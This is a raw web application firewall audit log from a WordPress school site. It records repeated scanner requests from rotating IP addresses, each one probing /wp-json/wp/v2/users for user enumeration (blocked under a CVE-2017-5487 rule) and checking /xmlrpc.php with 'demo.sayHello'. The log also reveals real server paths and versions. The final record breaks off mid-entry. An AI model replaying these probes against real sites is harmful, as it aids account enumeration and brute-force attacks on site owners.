HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --afdc0830-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497737873059 5180 (- - -) Stopwatch2: 1747497737873059 5180; combined=3977, p1=533, p2=3218, p3=37, p4=39, p5=88, sr=112, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afdc0830-Z-- --32cf8c15-A-- [17/May/2025:23:02:17 +0700] aCizCXyxdQCiyU1ENFepJgAAAAY 103.236.140.4 34044 103.236.140.4 8181 --32cf8c15-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --32cf8c15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32cf8c15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497737876804 2292 (- - -) Stopwatch2: 1747497737876804 2292; combined=1240, p1=413, p2=794, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32cf8c15-Z-- --68d2156e-A-- [17/May/2025:23:02:22 +0700] aCizDhKi5m5upc8uMd4gywAAANE 103.236.140.4 34254 103.236.140.4 8181 --68d2156e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.30 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --68d2156e-C-- demo.sayHello --68d2156e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --68d2156e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497742301189 5877 (- - -) Stopwatch2: 1747497742301189 5877; combined=4842, p1=617, p2=3982, p3=40, p4=41, p5=98, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68d2156e-Z-- --5e56d619-A-- [17/May/2025:23:02:31 +0700] aCizF3yxdQCiyU1ENFepZgAAAAE 103.236.140.4 34644 103.236.140.4 8181 --5e56d619-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5e56d619-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e56d619-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497751464916 2014 (- - -) Stopwatch2: 1747497751464916 2014; combined=1011, p1=387, p2=602, p3=0, p4=0, p5=22, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e56d619-Z-- --2e22684f-A-- [17/May/2025:23:02:42 +0700] aCizIum4kjNN-hEbWjKphgAAAEA 103.236.140.4 35136 103.236.140.4 8181 --2e22684f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2e22684f-C-- demo.sayHello --2e22684f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e22684f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497762695231 5616 (- - -) Stopwatch2: 1747497762695231 5616; combined=4452, p1=580, p2=3621, p3=41, p4=42, p5=98, sr=73, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e22684f-Z-- --60361a64-A-- [17/May/2025:23:04:01 +0700] aCizcXyxdQCiyU1ENFeqkAAAAAs 103.236.140.4 38530 103.236.140.4 8181 --60361a64-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --60361a64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60361a64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497841799517 2555 (- - -) Stopwatch2: 1747497841799517 2555; combined=1037, p1=349, p2=661, p3=0, p4=0, p5=27, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60361a64-Z-- --ea852d0c-A-- [17/May/2025:23:04:09 +0700] aCizeem4kjNN-hEbWjKriAAAAEE 103.236.140.4 38960 103.236.140.4 8181 --ea852d0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ea852d0c-C-- demo.sayHello --ea852d0c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea852d0c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497849354039 6012 (- - -) Stopwatch2: 1747497849354039 6012; combined=4597, p1=636, p2=3730, p3=34, p4=38, p5=95, sr=76, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea852d0c-Z-- --31fef111-A-- [17/May/2025:23:04:20 +0700] aCizhOm4kjNN-hEbWjKr3wAAAE0 103.236.140.4 39482 103.236.140.4 8181 --31fef111-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --31fef111-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31fef111-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497860334975 2081 (- - -) Stopwatch2: 1747497860334975 2081; combined=972, p1=322, p2=626, p3=0, p4=0, p5=24, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31fef111-Z-- --45acab07-A-- [17/May/2025:23:04:26 +0700] aCizigTOsBn9MSWb6WLfagAAAIE 103.236.140.4 39824 103.236.140.4 8181 --45acab07-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --45acab07-C-- demo.sayHello --45acab07-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --45acab07-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497866001298 5469 (- - -) Stopwatch2: 1747497866001298 5469; combined=3921, p1=507, p2=3195, p3=35, p4=38, p5=87, sr=63, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45acab07-Z-- --0af85372-A-- [17/May/2025:23:06:16 +0700] aCiz-ATOsBn9MSWb6WLiBwAAAI8 103.236.140.4 46706 103.236.140.4 8181 --0af85372-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0af85372-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0af85372-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497976220844 3094 (- - -) Stopwatch2: 1747497976220844 3094; combined=1514, p1=532, p2=956, p3=0, p4=0, p5=26, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0af85372-Z-- --3666fe43-A-- [17/May/2025:23:06:22 +0700] aCiz_gTOsBn9MSWb6WLiGgAAAIo 103.236.140.4 47172 103.236.140.4 8181 --3666fe43-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.57 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3666fe43-C-- demo.sayHello --3666fe43-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3666fe43-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497982625495 6490 (- - -) Stopwatch2: 1747497982625495 6490; combined=4752, p1=509, p2=3964, p3=51, p4=65, p5=94, sr=60, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3666fe43-Z-- --f65bd329-A-- [17/May/2025:23:07:31 +0700] aCi0Q3yxdQCiyU1ENFevZAAAAAI 103.236.140.4 51960 103.236.140.4 8181 --f65bd329-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f65bd329-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f65bd329-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498051597488 4160 (- - -) Stopwatch2: 1747498051597488 4160; combined=2446, p1=761, p2=1637, p3=0, p4=0, p5=48, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f65bd329-Z-- --0579ba70-A-- [17/May/2025:23:07:37 +0700] aCi0SRKi5m5upc8uMd4o4wAAAMY 103.236.140.4 52344 103.236.140.4 8181 --0579ba70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0579ba70-C-- demo.sayHello --0579ba70-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0579ba70-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498057438260 4535 (- - -) Stopwatch2: 1747498057438260 4535; combined=3409, p1=423, p2=2775, p3=28, p4=31, p5=88, sr=56, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0579ba70-Z-- --e0da8107-A-- [17/May/2025:23:08:45 +0700] aCi0jRKi5m5upc8uMd4rBwAAANM 103.236.140.4 57154 103.236.140.4 8181 --e0da8107-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0da8107-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0da8107-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498125166856 1769 (- - -) Stopwatch2: 1747498125166856 1769; combined=879, p1=277, p2=555, p3=0, p4=0, p5=47, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0da8107-Z-- --7283bc74-A-- [17/May/2025:23:08:50 +0700] aCi0kgTOsBn9MSWb6WLl-AAAAI8 103.236.140.4 57540 103.236.140.4 8181 --7283bc74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7283bc74-C-- demo.sayHello --7283bc74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7283bc74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498130088590 4196 (- - -) Stopwatch2: 1747498130088590 4196; combined=2873, p1=359, p2=2354, p3=23, p4=26, p5=65, sr=48, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7283bc74-Z-- --0d5e1147-A-- [17/May/2025:23:10:02 +0700] aCi02hKi5m5upc8uMd4togAAANg 103.236.140.4 34236 103.236.140.4 8181 --0d5e1147-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0d5e1147-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d5e1147-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498202166610 3297 (- - -) Stopwatch2: 1747498202166610 3297; combined=1708, p1=531, p2=1148, p3=0, p4=0, p5=29, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d5e1147-Z-- --de4fc928-A-- [17/May/2025:23:10:06 +0700] aCi03nyxdQCiyU1ENFey7AAAAAU 103.236.140.4 34592 103.236.140.4 8181 --de4fc928-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.74 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --de4fc928-C-- demo.sayHello --de4fc928-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --de4fc928-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498206845239 6272 (- - -) Stopwatch2: 1747498206845239 6272; combined=4832, p1=628, p2=3955, p3=43, p4=56, p5=89, sr=63, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de4fc928-Z-- --a4c5b820-A-- [17/May/2025:23:10:42 +0700] aCi1AhKi5m5upc8uMd4vRwAAAMg 103.236.140.4 37138 103.236.140.4 8181 --a4c5b820-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.170 X-Forwarded-Host: smkn22-jkt.sch.id 